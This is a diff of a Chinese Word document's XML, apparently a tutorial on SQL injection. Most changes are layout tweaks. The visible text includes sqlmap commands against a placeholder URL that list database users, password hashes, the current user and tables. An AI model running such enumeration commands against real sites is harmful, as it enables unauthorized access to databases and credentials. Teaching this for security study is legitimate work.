--- a/23.SQL注入/SQL注入原理及应用.docx
+++ b/23.SQL注入/SQL注入原理及应用.docx
@@ -12,8 +12,6 @@
         </w:rPr>
         <w:t>原理</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -51,9 +49,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>1</w:t>
@@ -82,9 +77,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -128,9 +120,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>2</w:t>
@@ -275,11 +264,6 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:tab/>
       </w:r>
@@ -313,9 +297,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -351,9 +332,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:leftChars="200" w:left="480"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -371,9 +349,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:leftChars="200" w:left="480"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -417,9 +392,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:leftChars="200" w:left="480"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -437,9 +409,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:leftChars="200" w:left="480"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -457,9 +426,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -508,9 +474,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -541,9 +504,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -555,9 +515,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -594,7 +551,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:firstLine="420"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
@@ -604,17 +561,9 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="09078836" wp14:editId="6C17DC77">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="margin">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>87216</wp:posOffset>
-            </wp:positionV>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5321DA81" wp14:editId="54C87468">
             <wp:extent cx="4897755" cy="1986915"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapTopAndBottom/>
             <wp:docPr id="1" name="图片 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -627,7 +576,13 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId4"/>
+                    <a:blip r:embed="rId4">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -644,15 +599,14 @@
                 </pic:pic>
               </a:graphicData>
             </a:graphic>
-            <wp14:sizeRelH relativeFrom="margin">
-              <wp14:pctWidth>0</wp14:pctWidth>
-            </wp14:sizeRelH>
-            <wp14:sizeRelV relativeFrom="margin">
-              <wp14:pctHeight>0</wp14:pctHeight>
-            </wp14:sizeRelV>
-          </wp:anchor>
+          </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -663,9 +617,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -695,9 +646,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -765,9 +713,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -804,9 +749,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -849,9 +791,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -859,10 +798,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> sqlmap.py -u http://www.xxx.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>com/system/cms/show?id=1  --</w:t>
+        <w:t xml:space="preserve"> sqlmap.py -u http://www.xxx.com/system/cms/show?id=1  --</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -873,9 +809,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -887,9 +820,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -932,20 +862,26 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>结果：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B457C0B" wp14:editId="1D498A11">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="margin">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>298036</wp:posOffset>
-            </wp:positionV>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11662472" wp14:editId="1690EFB3">
             <wp:extent cx="4947920" cy="1863090"/>
             <wp:effectExtent l="0" t="0" r="5080" b="3810"/>
-            <wp:wrapTopAndBottom/>
             <wp:docPr id="2" name="图片 2"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -958,7 +894,13 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId5"/>
+                    <a:blip r:embed="rId5">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -975,28 +917,13 @@
                 </pic:pic>
               </a:graphicData>
             </a:graphic>
-            <wp14:sizeRelH relativeFrom="margin">
-              <wp14:pctWidth>0</wp14:pctWidth>
-            </wp14:sizeRelH>
-            <wp14:sizeRelV relativeFrom="margin">
-              <wp14:pctHeight>0</wp14:pctHeight>
-            </wp14:sizeRelV>
-          </wp:anchor>
+          </wp:inline>
         </w:drawing>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>结果：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1039,9 +966,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1060,9 +984,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -1070,10 +991,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> sqlmap.py -u http://www.xxx.com/sy</w:t>
-      </w:r>
-      <w:r>
-        <w:t>stem/cms/show?id=1 --current-</w:t>
+        <w:t xml:space="preserve"> sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --current-</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1084,9 +1002,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1098,9 +1013,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1129,20 +1041,23 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>结果：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="460FD77E" wp14:editId="78DA2A8B">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="margin">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>324127</wp:posOffset>
-            </wp:positionV>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26EB7DC0" wp14:editId="33440106">
             <wp:extent cx="4900295" cy="2767330"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapTopAndBottom/>
             <wp:docPr id="3" name="图片 3"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1155,7 +1070,13 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6"/>
+                    <a:blip r:embed="rId6">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1172,35 +1093,13 @@
                 </pic:pic>
               </a:graphicData>
             </a:graphic>
-            <wp14:sizeRelH relativeFrom="margin">
-              <wp14:pctWidth>0</wp14:pctWidth>
-            </wp14:sizeRelH>
-            <wp14:sizeRelV relativeFrom="margin">
-              <wp14:pctHeight>0</wp14:pctHeight>
-            </wp14:sizeRelV>
-          </wp:anchor>
+          </wp:inline>
         </w:drawing>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>结果：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1219,22 +1118,27 @@
       <w:pPr>
         <w:ind w:firstLine="420"/>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>python</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --current-user</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="150E5BDA" wp14:editId="37E6E7A6">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="margin">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>333624</wp:posOffset>
-            </wp:positionV>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66F0673F" wp14:editId="2FB5BF65">
             <wp:extent cx="4598035" cy="2612390"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapTopAndBottom/>
             <wp:docPr id="4" name="图片 4"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1247,7 +1151,13 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId7">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1264,108 +1174,69 @@
                 </pic:pic>
               </a:graphicData>
             </a:graphic>
-            <wp14:sizeRelH relativeFrom="margin">
-              <wp14:pctWidth>0</wp14:pctWidth>
-            </wp14:sizeRelH>
-            <wp14:sizeRelV relativeFrom="margin">
-              <wp14:pctHeight>0</wp14:pctHeight>
-            </wp14:sizeRelV>
-          </wp:anchor>
+          </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>列出</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>sqlserver</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>所有用户</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+      </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>python</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --current-user</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">5) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>列出</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>sqlserver</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>所有用户</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420"/>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>python</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
         <w:t xml:space="preserve"> sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --users</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="31E3D677" wp14:editId="3D1807A0">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="margin">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>100551</wp:posOffset>
-            </wp:positionV>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4685665" cy="2724150"/>
             <wp:effectExtent l="0" t="0" r="635" b="0"/>
-            <wp:wrapTopAndBottom/>
             <wp:docPr id="5" name="图片 5"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1378,7 +1249,13 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
+                    <a:blip r:embed="rId8">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1395,22 +1272,13 @@
                 </pic:pic>
               </a:graphicData>
             </a:graphic>
-            <wp14:sizeRelH relativeFrom="margin">
-              <wp14:pctWidth>0</wp14:pctWidth>
-            </wp14:sizeRelH>
-            <wp14:sizeRelV relativeFrom="margin">
-              <wp14:pctHeight>0</wp14:pctHeight>
-            </wp14:sizeRelV>
-          </wp:anchor>
+          </wp:inline>
         </w:drawing>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1429,22 +1297,44 @@
       <w:pPr>
         <w:ind w:firstLine="420"/>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>python</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> sqlmap.py -u http://www.xxx.com/s</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ystem/cms/show?id=1 –passwords</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>结果显示该用户可能无读取相关系统的权限。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2EFBA1F5" wp14:editId="0F9A5B5B">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="margin">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>279289</wp:posOffset>
-            </wp:positionV>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33FD8122" wp14:editId="1F4FBB56">
             <wp:extent cx="4678680" cy="1463675"/>
             <wp:effectExtent l="0" t="0" r="7620" b="3175"/>
-            <wp:wrapTopAndBottom/>
             <wp:docPr id="6" name="图片 6"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1457,7 +1347,13 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId9">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1474,79 +1370,37 @@
                 </pic:pic>
               </a:graphicData>
             </a:graphic>
-            <wp14:sizeRelH relativeFrom="margin">
-              <wp14:pctWidth>0</wp14:pctWidth>
-            </wp14:sizeRelH>
-            <wp14:sizeRelV relativeFrom="margin">
-              <wp14:pctHeight>0</wp14:pctHeight>
-            </wp14:sizeRelV>
-          </wp:anchor>
+          </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">7) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>列出数据库中的表</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+      </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>python</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> sqlmap.py -u http://www.xxx.com/s</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ystem/cms/show?id=1 –passwords</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>结果显示该用户可能无读取相关系统的权限。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">7) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>列出数据库中的表</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>python</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
         <w:t xml:space="preserve"> sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -1555,18 +1409,12 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> --table</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">s </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:t xml:space="preserve"> --tables </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1578,9 +1426,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1598,9 +1443,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1618,9 +1460,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1631,17 +1470,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:jc w:val="center"/>
